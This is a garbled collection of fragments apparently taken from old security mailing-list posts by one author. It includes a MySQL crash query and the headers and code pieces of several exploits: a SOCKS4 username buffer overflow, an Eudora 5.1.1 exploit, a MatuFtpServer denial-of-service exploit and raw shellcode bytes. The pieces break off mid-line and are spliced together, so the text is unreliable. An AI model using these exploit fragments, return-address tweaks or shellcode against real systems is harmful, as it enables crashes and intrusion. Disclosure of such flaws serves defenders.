Description:
A query like select str_to_date( 1, NULL ); crashes mysqld.
Unaffected versions:
*= 4.1.18
*= 5.0.19
*= 5.1.6
For more details:
http://bugs.mysql.com/bug.php?id=15828
--
Kanatoko[EMAIL PROTECTED]
Open Source WebAppFirewall
http://guardian.jumperz.net/
Version 1.41c SOCKS4 username buffer overflow exploit
for Japanese Windows 2000 Pro (SP2)
written by Kanatoko [EMAIL PROTECTED]
http://www.jumperz.net/
///*/
import java.net.*;
import java.io.*;
public class
44
$buf .= $jmp_ebx_jp;
to
$buf .= $jmp_ebx_en;
and test it.
Sorry for my poor English.
#!/usr/local/bin/perl
#--
# Eudora Version 5.1.1 Sponsored Mode exploit
# for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko [EMAIL PROTECTED
by Kanatoko [EMAIL PROTECTED]
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#---
use Socket;
$connect_host = socks.example.com;
$port = 1080;
$iaddr = inet_aton($connect_host) || die Host Resolve Error.\n
---*/
This exploit code will shutdown target host.
#!/usr/local/bin/perl
#---
# MatuFtpServer 1.1.3.0 exploit ( for Windows98 )
# written by Kanatoko [EMAIL PROTECTED]
# http://www.jumperz.net
under inetd )
# written by Kanatoko [EMAIL PROTECTED]
# http://www.jumperz.net/
#--
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2;
$egg .= \x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF